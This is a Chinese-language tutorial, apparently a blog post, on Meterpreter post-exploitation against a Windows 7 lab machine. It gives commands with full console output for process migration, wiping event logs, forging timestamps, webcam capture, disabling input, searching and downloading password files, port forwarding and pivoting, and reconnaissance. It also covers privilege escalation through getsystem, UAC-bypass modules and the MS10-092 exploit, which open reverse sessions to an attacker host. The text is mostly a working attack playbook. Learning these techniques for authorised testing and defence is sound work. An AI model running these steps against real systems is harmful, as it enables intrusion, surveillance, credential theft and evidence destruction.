後滲透之meterpreter攻略
阿新 • • 發佈:2019-01-07
系統命令 基本系統命令 sessions #sessions –h 檢視幫助 sessions -i <ID值> #進入會話 -k 殺死會話 background #將當前會話放置後臺 run #執行已有的模組,輸入run後按兩下tab,列出已有的指令碼 info #檢視已有模組資訊 getuid # 檢視許可權 getpid # 獲取當前程序的pid sysinfo # 檢視目標機系統資訊 ps # 檢視當前活躍程序 kill <PID值> 殺死程序 idletime #檢視目標機閒置時間 reboot / shutdown #重啟/關機 shell #進入目標機cmd shell meterpreter> getuid Server username: WIN-7\Win7 meterpreter > getpid Current pid: 2852 meterpreter > sysinfo Computer : WIN-7 OS : Windows 7 (Build 7600). Architecture : x64 System Language : zh_CN Domain : UKNOWSEC Logged On Users : 3 Meterpreter : x86/windows
meterpreter> ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System248 500 svchost.exe 268 4 smss.exe 356 348 csrss.exe 396 348 wininit.exe 404 388 csrss.exe 440 388 winlogon.exe 500 396 services.exe 508 396 lsass.exe 516 396 lsm.exe 628 500 svchost.exe 648 500 svchost.exe 688 500 vmacthlp.exe 732 500 svchost.exe 772 500 svchost.exe 832 500 TrustedInstaller.exe 860 500 svchost.exe 900 500 svchost.exe 1084 500 spoolsv.exe 1112 500 svchost.exe 1260 500 svchost.exe 1272 500 sppsvc.exe 1356 500 VGAuthService.exe 1396 628 WmiPrvSE.exe 1548 500 vmtoolsd.exe 1764 500 ManagementAgentHost.exe 1780 500 wmpnetwk.exe 1908 500 svchost.exe 2036 500 msdtc.exe 2348 404 conhost.exe x64 1 WIN-7\Win7 C:\Windows\System32\conhost.exe 2356 2752 cmd.exe x64 1 WIN-7\Win7 C:\Windows\System32\cmd.exe 2532 500 svchost.exe 2684 500 taskhost.exe x64 1 WIN-7\Win7 C:\Windows\System32\taskhost.exe 2736 860 dwm.exe x64 1 WIN-7\Win7 C:\Windows\System32\dwm.exe 2752 2728 explorer.exe x64 1 WIN-7\Win7 C:\Windows\explorer.exe 2852 3380 shell.exe x86 1 WIN-7\Win7 C:\Users\Win7\Desktop\shell.exe 2876 2752 vmtoolsd.exe x64 1 WIN-7\Win7 C:\Program Files\VMware\VMware Tools\vmtoolsd.exe 3048 500 SearchIndexer.exe 3816 900 wuauclt.exe x64 1 WIN-7\Win7 C:\Windows\System32\wuauclt.exe 3824 500 svchost.exe meterpreter > idletime User has been idle for: 14 mins 20 secs uictl開關鍵盤/滑鼠 uictl [enable/disable] [keyboard/mouse/all] #開啟或禁止鍵盤/滑鼠 uictl disable mouse #禁用滑鼠 uictl disable keyboard #禁用鍵盤 meterpreter > uictl disable mouse Disabling mouse... meterpreter > uictl disable keyboard Disabling keyboard... meterpreter > uictl enable mouse Enabling mouse... meterpreter > uictl enable keyboard Enabling keyboard... webcam攝像頭命令 webcam_list #檢視攝像頭 webcam_snap #通過攝像頭拍照 webcam_stream #通過攝像頭開啟視訊 execute執行檔案 execute #在目標機中執行檔案 execute -H -i -f cmd.exe # 建立新程序cmd.exe,-H不可見,-i互動 meterpreter > execute -H -i -f cmd.exe Process 3616 created. Channel 1 created. Microsoft Windows [�汾 6.1.7600] ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ���� C:\Users\Win7\Desktop> migrate程序遷移 getpid # 獲取當前程序的pid ps # 檢視當前活躍程序 migrate <pid值> #將Meterpreter會話移植到指定pid值程序中 kill <pid值> #殺死程序 meterpreter > getpid Current pid: 2852 meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System 248 500 svchost.exe 268 4 smss.exe 356 348 csrss.exe 396 348 wininit.exe 404 388 csrss.exe 440 388 winlogon.exe 500 396 services.exe 508 396 lsass.exe 516 396 lsm.exe 628 500 svchost.exe 648 500 svchost.exe 688 500 vmacthlp.exe 732 500 svchost.exe 772 500 svchost.exe 832 500 TrustedInstaller.exe 860 500 svchost.exe 900 500 svchost.exe 1084 500 spoolsv.exe 1112 500 svchost.exe 1260 500 svchost.exe 1272 500 sppsvc.exe 1356 500 VGAuthService.exe 1396 628 WmiPrvSE.exe 1548 500 vmtoolsd.exe 1764 500 ManagementAgentHost.exe 1780 500 wmpnetwk.exe 1908 500 svchost.exe 2036 500 msdtc.exe 2348 404 conhost.exe x64 1 WIN-7\Win7 C:\Windows\System32\conhost.exe 2356 2752 cmd.exe x64 1 WIN-7\Win7 C:\Windows\System32\cmd.exe 2504 2752 calc.exe x64 1 WIN-7\Win7 C:\Windows\System32\calc.exe 2532 500 svchost.exe 2684 500 taskhost.exe x64 1 WIN-7\Win7 C:\Windows\System32\taskhost.exe 2736 860 dwm.exe x64 1 WIN-7\Win7 C:\Windows\System32\dwm.exe 2752 2728 explorer.exe x64 1 WIN-7\Win7 C:\Windows\explorer.exe 2852 3380 shell.exe x86 1 WIN-7\Win7 C:\Users\Win7\Desktop\shell.exe 2876 2752 vmtoolsd.exe x64 1 WIN-7\Win7 C:\Program Files\VMware\VMware Tools\vmtoolsd.exe 3048 500 SearchIndexer.exe 3316 772 audiodg.exe x64 0 3816 900 wuauclt.exe x64 1 WIN-7\Win7 C:\Windows\System32\wuauclt.exe 3824 500 svchost.exe meterpreter > migrate 2876 [*] Migrating from 3504 to 2876... [*] Migration completed successfully. clearev清除日誌 clearev #清除windows中的應用程式日誌、系統日誌、安全日誌 meterpreter > clearev [*] Wiping 365 records from Application... [*] Wiping 1222 records from System... [*] Wiping 404 records from Security...
檔案系統命令 基本檔案系統命令 getwd 或者pwd # 檢視當前工作目錄 ls cd search -f *pass* # 搜尋檔案 -h檢視幫助 cat c:\\lltest\\lltestpasswd.txt # 檢視檔案內容 upload /tmp/hack.txt C:\\lltest # 上傳檔案到目標機上 download c:\\lltest\\lltestpasswd.txt /tmp/ # 下載檔案到本機上 edit c:\\1.txt #編輯或建立檔案 沒有的話,會新建檔案 rm C:\\lltest\\hack.txt mkdir lltest2 #只能在當前目錄下建立資料夾 rmdir lltest2 #只能刪除當前目錄下資料夾 getlwd 或者 lpwd #操作攻擊者主機 檢視當前目錄 lcd /tmp #操作攻擊者主機 切換目錄 timestomp偽造時間戳 timestomp C:// -h #檢視幫助 timestomp -v C://2.txt #檢視時間戳 timestomp C://2.txt -f C://1.txt #將1.txt的時間戳複製給2.txt meterpreter > timestomp -v C://2.txt [*] Showing MACE attributes for C://2.txt Modified : 2018-12-18 00:48:02 -0500 Accessed : 2018-12-18 00:48:02 -0500 Created : 2018-12-17 22:52:59 -0500 Entry Modified: 2018-12-18 00:48:10 -0500 meterpreter > timestomp -v C://1.txt [*] Showing MACE attributes for C://1.txt Modified : 2018-12-17 22:52:44 -0500 Accessed : 2018-12-17 22:52:59 -0500 Created : 2018-12-17 22:52:59 -0500 Entry Modified: 2018-12-17 22:52:59 -0500 meterpreter > timestomp C://2.txt -f C://1.txt [*] Pulling MACE attributes from C://1.txt [*] Setting specific MACE attributes on C://2.txt meterpreter > timestomp -v C://2.txt [*] Showing MACE attributes for C://2.txt Modified : 2018-12-17 22:52:44 -0500 Accessed : 2018-12-17 22:52:59 -0500 Created : 2018-12-17 22:52:59 -0500 Entry Modified: 2018-12-17 22:52:59 -0500
網路命令 基本網路命令 ipconfig/ifconfig netstat –ano arp getproxy #檢視代理資訊 route #檢視路由 meterpreter > ipconfig Interface 1 ============ Name : Software Loopback Interface 1 Hardware MAC : 00:00:00:00:00:00 MTU : 4294967295 IPv4 Address : 127.0.0.1 IPv4 Netmask : 255.0.0.0 IPv6 Address : ::1 IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Interface 11 ============ Name : Intel(R) PRO/1000 MT Network Connection Hardware MAC : 00:0c:29:ba:a6:a7 MTU : 1500 IPv4 Address : 192.168.130.128 IPv4 Netmask : 255.255.255.0 IPv6 Address : fe80::c55f:725f:9e7d:7056 IPv6 Netmask : ffff:ffff:ffff:ffff:: Interface 12 ============ Name : Microsoft ISATAP Adapter Hardware MAC : 00:00:00:00:00:00 MTU : 1280 IPv6 Address : fe80::5efe:c0a8:16ab IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff IPv6 Address : fe80::5efe:c0a8:8280 IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Interface 13 ============ Name : Teredo Tunneling Pseudo-Interface Hardware MAC : 00:00:00:00:00:00 MTU : 1280 IPv6 Address : fe80::100:7f:fffe IPv6 Netmask : ffff:ffff:ffff:ffff:: Interface 14 ============ Name : Intel(R) PRO/1000 MT Network Connection #2 Hardware MAC : 00:0c:29:ba:a6:b1 MTU : 1500 IPv4 Address : 192.168.22.171 IPv4 Netmask : 255.255.255.0 IPv6 Address : fe80::b96b:f6e6:3371:444f IPv6 Netmask : ffff:ffff:ffff:ffff:: meterpreter > netstat -ano Connection list =============== Proto Local address Remote address State User Inode PID/Program name ----- ------------- -------------- ----- ---- ----- ---------------- tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 732/svchost.exe tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System tcp 0.0.0.0:554 0.0.0.0:* LISTEN 0 0 1780/wmpnetwk.exe tcp 0.0.0.0:5357 0.0.0.0:* LISTEN 0 0 4/System tcp 0.0.0.0:49152 0.0.0.0:* LISTEN 0 0 396/wininit.exe tcp 0.0.0.0:49153 0.0.0.0:* LISTEN 0 0 772/svchost.exe tcp 0.0.0.0:49154 0.0.0.0:* LISTEN 0 0 900/svchost.exe tcp 0.0.0.0:49171 0.0.0.0:* LISTEN 0 0 508/lsass.exe tcp 0.0.0.0:49176 0.0.0.0:* LISTEN 0 0 500/services.exe tcp 0.0.0.0:49179 0.0.0.0:* LISTEN 0 0 1908/svchost.exe tcp 192.168.22.171:139 0.0.0.0:* LISTEN 0 0 4/System tcp 192.168.22.171:58500 192.168.22.170:4444 ESTABLISHED 0 0 2876/vmtoolsd.exe tcp 192.168.22.171:58879 192.168.22.170:4444 ESTABLISHED 0 0 1684/shell.exe tcp 192.168.130.128:139 0.0.0.0:* LISTEN 0 0 4/System tcp6 :::135 :::* LISTEN 0 0 732/svchost.exe tcp6 :::445 :::* LISTEN 0 0 4/System tcp6 :::554 :::* LISTEN 0 0 1780/wmpnetwk.exe tcp6 :::3587 :::* LISTEN 0 0 3824/svchost.exe tcp6 :::5357 :::* LISTEN 0 0 4/System tcp6 :::49152 :::* LISTEN 0 0 396/wininit.exe tcp6 :::49153 :::* LISTEN 0 0 772/svchost.exe tcp6 :::49154 :::* LISTEN 0 0 900/svchost.exe tcp6 :::49171 :::* LISTEN 0 0 508/lsass.exe tcp6 :::49176 :::* LISTEN 0 0 500/services.exe tcp6 :::49179 :::* LISTEN 0 0 1908/svchost.exe udp 0.0.0.0:123 0.0.0.0:* 0 0 248/svchost.exe udp 0.0.0.0:500 0.0.0.0:* 0 0 900/svchost.exe udp 0.0.0.0:3702 0.0.0.0:* 0 0 248/svchost.exe udp 0.0.0.0:3702 0.0.0.0:* 0 0 1260/svchost.exe udp 0.0.0.0:3702 0.0.0.0:* 0 0 248/svchost.exe udp 0.0.0.0:3702 0.0.0.0:* 0 0 1260/svchost.exe udp 0.0.0.0:4500 0.0.0.0:* 0 0 900/svchost.exe udp 0.0.0.0:5004 0.0.0.0:* 0 0 1780/wmpnetwk.exe udp 0.0.0.0:5005 0.0.0.0:* 0 0 1780/wmpnetwk.exe udp 0.0.0.0:5355 0.0.0.0:* 0 0 648/svchost.exe udp 0.0.0.0:52358 0.0.0.0:* 0 0 1260/svchost.exe udp 0.0.0.0:58751 0.0.0.0:* 0 0 648/svchost.exe udp 0.0.0.0:62445 0.0.0.0:* 0 0 248/svchost.exe udp 0.0.0.0:65389 0.0.0.0:* 0 0 248/svchost.exe udp 127.0.0.1:1900 0.0.0.0:* 0 0 1260/svchost.exe udp 127.0.0.1:50203 0.0.0.0:* 0 0 508/lsass.exe udp 127.0.0.1:52360 0.0.0.0:* 0 0 648/svchost.exe udp 127.0.0.1:55889 0.0.0.0:* 0 0 1260/svchost.exe udp 127.0.0.1:64192 0.0.0.0:* 0 0 900/svchost.exe udp 192.168.22.171:137 0.0.0.0:* 0 0 4/System udp 192.168.22.171:138 0.0.0.0:* 0 0 4/System udp 192.168.22.171:1900 0.0.0.0:* 0 0 1260/svchost.exe udp 192.168.22.171:55887 0.0.0.0:* 0 0 1260/svchost.exe udp 192.168.130.128:137 0.0.0.0:* 0 0 4/System udp 192.168.130.128:138 0.0.0.0:* 0 0 4/System udp 192.168.130.128:1900 0.0.0.0:* 0 0 1260/svchost.exe udp 192.168.130.128:55888 0.0.0.0:* 0 0 1260/svchost.exe udp6 :::123 :::* 0 0 248/svchost.exe udp6 :::500 :::* 0 0 900/svchost.exe udp6 :::3540 :::* 0 0 3824/svchost.exe udp6 :::3702 :::* 0 0 248/svchost.exe udp6 :::3702 :::* 0 0 1260/svchost.exe udp6 :::3702 :::* 0 0 248/svchost.exe udp6 :::3702 :::* 0 0 1260/svchost.exe udp6 :::4500 :::* 0 0 900/svchost.exe udp6 :::5004 :::* 0 0 1780/wmpnetwk.exe udp6 :::5005 :::* 0 0 1780/wmpnetwk.exe udp6 :::5355 :::* 0 0 648/svchost.exe udp6 :::52359 :::* 0 0 1260/svchost.exe udp6 :::62446 :::* 0 0 248/svchost.exe udp6 :::65390 :::* 0 0 248/svchost.exe udp6 ::1:1900 :::* 0 0 1260/svchost.exe udp6 ::1:55886 :::* 0 0 1260/svchost.exe udp6 fe80::b96b:f6e6:3371:444f:1900 :::* 0 0 1260/svchost.exe udp6 fe80::b96b:f6e6:3371:444f:55884 :::* 0 0 1260/svchost.exe udp6 fe80::c55f:725f:9e7d:7056:546 :::* 0 0 772/svchost.exe udp6 fe80::c55f:725f:9e7d:7056:1900 :::* 0 0 1260/svchost.exe udp6 fe80::c55f:725f:9e7d:7056:55885 :::* 0 0 1260/svchost.exe meterpreter > arp ARP cache ========= IP address MAC address Interface ---------- ----------- --------- 192.168.22.2 00:50:56:f2:7a:67 14 192.168.22.170 00:0c:29:92:d5:46 14 192.168.22.254 00:50:56:f5:66:dc 14 192.168.22.255 ff:ff:ff:ff:ff:ff 14 192.168.130.129 00:0c:29:74:6d:d0 11 192.168.130.254 00:50:56:f7:97:52 11 192.168.130.255 ff:ff:ff:ff:ff:ff 11 224.0.0.22 00:00:00:00:00:00 1 224.0.0.22 01:00:5e:00:00:16 11 224.0.0.22 01:00:5e:00:00:16 14 224.0.0.252 01:00:5e:00:00:fc 11 224.0.0.252 01:00:5e:00:00:fc 14 239.255.255.250 00:00:00:00:00:00 1 239.255.255.250 01:00:5e:7f:ff:fa 11 239.255.255.250 01:00:5e:7f:ff:fa 14 255.255.255.255 ff:ff:ff:ff:ff:ff 11 255.255.255.255 ff:ff:ff:ff:ff:ff 14 meterpreter > getproxy Auto-detect : Yes Auto config URL : Proxy URL : Proxy Bypass : meterpreter > route IPv4 network routes =================== Subnet Netmask Gateway Metric Interface ------ ------- ------- ------ --------- 0.0.0.0 0.0.0.0 192.168.22.2 10 14 127.0.0.0 255.0.0.0 127.0.0.1 306 1 127.0.0.1 255.255.255.255 127.0.0.1 306 1 127.255.255.255 255.255.255.255 127.0.0.1 306 1 192.168.22.0 255.255.255.0 192.168.22.171 266 14 192.168.22.171 255.255.255.255 192.168.22.171 266 14 192.168.22.255 255.255.255.255 192.168.22.171 266 14 192.168.130.0 255.255.255.0 192.168.130.128 266 11 192.168.130.128 255.255.255.255 192.168.130.128 266 11 192.168.130.255 255.255.255.255 192.168.130.128 266 11 224.0.0.0 240.0.0.0 127.0.0.1 306 1 224.0.0.0 240.0.0.0 192.168.130.128 266 11 224.0.0.0 240.0.0.0 192.168.22.171 266 14 255.255.255.255 255.255.255.255 127.0.0.1 306 1 255.255.255.255 255.255.255.255 192.168.130.128 266 11 255.255.255.255 255.255.255.255 192.168.22.171 266 14 No IPv6 routes were found. meterpreter > portfwd埠轉發 portfwd add -l 6666 -p 3389 -r 127.0.0.1 #將目標機的3389埠轉發到本地6666埠 portfwd delete -l 6666 -p 3389 -r 127.0.0.1 #將目標機的3389埠轉發到本地6666埠刪除 meterpreter > portfwd add -l 6666 -p 3389 -r 127.0.0.1 [*] Local TCP relay created: :6666 <-> 127.0.0.1:3389 meterpreter > portfwd delete -l 6666 -p 3389 -r 127.0.0.1 [*] Successfully stopped TCP relay on 0.0.0.0:6666 meterpreter > portfwd list Active Port Forwards ==================== Index Local Remote Direction ----- ----- ------ --------- 1 0.0.0.0:6666 127.0.0.1:3389 Forward 1 total active port forwards. meterpreter > portfwd flush [*] Successfully stopped TCP relay on 0.0.0.0:6666 [*] Successfully flushed 1 rules meterpreter > portfwd list No port forwards are currently active. [email protected]:~# rdesktop 127.0.0.1:6666 Failed to negotiate protocol, retrying with plain RDP. WARNING: Remote desktop does not support colour depth 24; falling back to 16 autoroute新增路由 run autoroute –h #檢視幫助 run autoroute -s 192.168.159.0/24 #新增到目標環境網路 run autoroute –p #檢視新增的路由 meterpreter > run autoroute -h [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] [*] Usage: run autoroute [-r] -s subnet -n netmask [*] Examples: [*] run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to 10.10.10.1/255.255.255.0 [*] run autoroute -s 10.10.10.1 # Netmask defaults to 255.255.255.0 [*] run autoroute -s 10.10.10.1/24 # CIDR notation is also okay [*] run autoroute -p # Print active routing table [*] run autoroute -d -s 10.10.10.1 # Deletes the 10.10.10.1/255.255.255.0 route [*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes [-] Deprecation warning: This script has been replaced by the post/multi/manage/autoroute module meterpreter > run autoroute -s 192.168.130.0/24 [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] [*] Adding a route to 192.168.130.0/255.255.255.0... [+] Added route to 192.168.130.0/255.255.255.0 via 192.168.22.171 [*] Use the -p option to list all active routes meterpreter > run autoroute -p [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 192.168.130.0 255.255.255.0 Session 1 meterpreter > 然後可以利用arp_scanner、portscan等進行掃描 run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24 run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389 meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.130.0/24 [*] Running module against WIN-7 [*] ARP Scanning 192.168.130.0/24 [+] IP: 192.168.130.1 MAC 00:50:56:c0:00:02 (VMware, Inc.) [+] IP: 192.168.130.128 MAC 00:0c:29:ba:a6:a7 (VMware, Inc.) [+] IP: 192.168.130.129 MAC 00:0c:29:74:6d:d0 (VMware, Inc.) [+] IP: 192.168.130.255 MAC 00:0c:29:ba:a6:a7 (VMware, Inc.) [+] IP: 192.168.130.254 MAC 00:50:56:f7:97:52 (VMware, Inc.)
Socks4a代理 msf> use auxiliary/server/socks4a msf > set srvhost 127.0.0.1 msf > set srvport 1080 msf > run [email protected]:~# gedit /etc/proxychains.conf socks4 127.0.0.1 1080 [email protected]:~# proxychains nmap -sV 192.168.130.129 ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-18 03:19 EST |S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:135-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:445-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:135-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK |S-chain|-<>-127.0.0.1:1080-<><>-192.168.130.129:49154-<><>-OK Nmap scan report for bogon (192.168.130.129) Host is up (0.0027s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 49154/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 118.08 seconds
資訊收集 資訊收集的指令碼較多,僅列幾個常用的: run post/windows/gather/checkvm #是否虛擬機器 run post/linux/gather/checkvm #是否虛擬機器 run post/windows/gather/forensics/enum_drives #檢視分割槽 run post/windows/gather/enum_applications #獲取安裝軟體資訊 run post/windows/gather/dumplinks #獲取最近的檔案操作 run post/windows/gather/enum_ie #獲取IE快取 run post/windows/gather/enum_chrome #獲取Chrome快取 run post/windows/gather/enum_patches #補丁資訊 run post/windows/gather/enum_domain #查詢域控 meterpreter > run post/windows/gather/checkvm [*] Checking if WIN-7 is a Virtual Machine ..... [+] This is a VMware Virtual Machine meterpreter > run post/windows/gather/forensics/enum_drives Device Name: Type: Size (bytes): ------------ ----- ------------- <Physical Drives:> \\.\PhysicalDrive0 4702111234474983745 <Logical Drives:> \\.\C: 4702111234474983745 \\.\D: 4702111234474983745 meterpreter > run post/windows/gather/enum_applications [*] Enumerating applications installed on WIN-7 Installed Applications ====================== Name Version ---- ------- Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161 [+] Results stored in: /root/.msf4/loot/20181218215218_default_192.168.22.171_host.application_993878.txt meterpreter > run post/windows/gather/dumplinks [*] Running module against WIN-7 [*] Extracting lnk files for user Administrator at C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\... [*] No Recent Office files found for user Administrator. Nothing to do. meterpreter > run post/windows/gather/enum_patches [+] KB2871997 is missing [+] KB2928120 is missing [+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86) [+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008 [+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2 [+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity [+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1 [+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1 meterpreter > run post/windows/gather/enum_domain [+] FOUND Domain: uknowsec [+] FOUND Domain Controller: WIN-0L310JHOGH6 (IP: 192.168.130.130)
提權 getsystem提權 getsystem getsystem工作原理: getsystem建立一個新的Windows服務,設定為SYSTEM執行,當它啟動時連線到一個命名管道。 getsystem產生一個程序,它建立一個命名管道並等待來自該服務的連線。 Windows服務已啟動,導致與命名管道建立連線。 該程序接收連線並呼叫ImpersonateNamedPipeClient,從而為SYSTEM使用者建立模擬令牌。 然後用新收集的SYSTEM模擬令牌產生cmd.exe,並且我們有一個SYSTEM特權程序。 meterpreter > getuid Server username: WIN-7\Win7 meterpreter > getsystem [-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted: [-] Named Pipe Impersonation (In Memory/Admin) [-] Named Pipe Impersonation (Dropper/Admin) [-] Token Duplication (In Memory/Admin) bypassuac 內建多個pypassuac指令碼,原理有所不同,使用方法類似,執行後返回一個新的會話,需要再次執行getsystem獲取系統許可權,如: msf exploit(windows/local/bypassuac_eventvwr) > search bypassuac Matching Modules ================ Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) exploit/windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key) exploit/windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) exploit/windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack) exploit/windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability) meterpreter > background [*] Backgrounding session 2... msf exploit(multi/handler) > use exploit/windows/local/bypassuac msf exploit(windows/local/bypassuac) > set session 2 session => 2 msf exploit(windows/local/bypassuac) > run [*] Started reverse TCP handler on 192.168.22.170:4444 [*] UAC is Enabled, checking level... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [+] Part of Administrators group! Continuing... [*] Uploaded the agent to the filesystem.... [*] Uploading the bypass UAC executable to the filesystem... [*] Meterpreter stager executable 73802 bytes long being uploaded.. [*] Sending stage (179779 bytes) to 192.168.22.171 [*] Meterpreter session 3 opened (192.168.22.170:4444 -> 192.168.22.171:59068) at 2018-12-18 22:12:04 -0500 meterpreter > getuid Server username: WIN-7\Win7 meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM msf exploit(windows/local/bypassuac) > use exploit/windows/local/bypassuac_eventvwr msf exploit(windows/local/bypassuac_eventvwr) > show options Module options (exploit/windows/local/bypassuac_eventvwr): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Exploit target: Id Name -- ---- 0 Windows x86 msf exploit(windows/local/bypassuac_eventvwr) > set session 2 session => 2 msf exploit(windows/local/bypassuac_eventvwr) > run [*] Started reverse TCP handler on 192.168.22.170:4444 [*] UAC is Enabled, checking level... [+] Part of Administrators group! Continuing... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [*] Configuring payload and stager registry keys ... [*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe [+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute. [*] Sending stage (179779 bytes) to 192.168.22.171 [*] Meterpreter session 4 opened (192.168.22.170:4444 -> 192.168.22.171:59075) at 2018-12-18 22:25:01 -0500 [*] Cleaning up registry keys ... meterpreter > getuid Server username: WIN-7\Win7 meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
核心漏洞提權 可先利用enum_patches模組收集補丁資訊,然後查詢可用的exploits進行提權 meterpreter > run post/windows/gather/enum_patches #檢視補丁資訊 meterpreter > run post/windows/gather/enum_patches [+] KB2871997 is missing [+] KB2928120 is missing [+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86) [+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008 [+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2 [+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity [+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1 [+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1 msf exploit(multi/handler) > use exploit/windows/local/ms10_092_schelevator msf exploit(windows/local/ms10_092_schelevator) > set session 5 session => 5 msf exploit(windows/local/ms10_092_schelevator) > run [*] Started reverse TCP handler on 192.168.22.170:4444 [*] Preparing payload at C:\Users\Win7\AppData\Local\Temp\IsamdcUIQQzv.exe [*] Creating task: lk6j4xdPvbMB [*] �ɹ�: �ɹ������ƻ����� "lk6j4xdPvbMB"�� [*] SCHELEVATOR [*] Reading the task file contents from C:\Windows\system32\tasks\lk6j4xdPvbMB... [*] Original CRC32: 0xd75a78d9 [*] Final CRC32: 0xd75a78d9 [*] Writing our modified content back... [*] Validating task: lk6j4xdPvbMB [*] ����: ����������Դ�� [*] Disabling the task... [*] �ɹ�: �����˼ƻ����� "lk6j4xdPvbMB" �IJ����� [*] SCHELEVATOR [*] Enabling the task... [*] �ɹ�: �����˼ƻ����� "lk6j4xdPvbMB" �IJ����� [*] SCHELEVATOR [*] Executing the task... [*] �ɹ�: �������� "lk6j4xdPvbMB"�� [*] SCHELEVATOR [*] Deleting the task... [*] Sending stage (179779 bytes) to 192.168.22.171 [*] �ɹ�: �ƻ������� "lk6j4xdPvbMB" ���ɹ�ɾ���� [*] SCHELEVATOR [*] Meterpreter session 6 opened (192.168.22.170:4444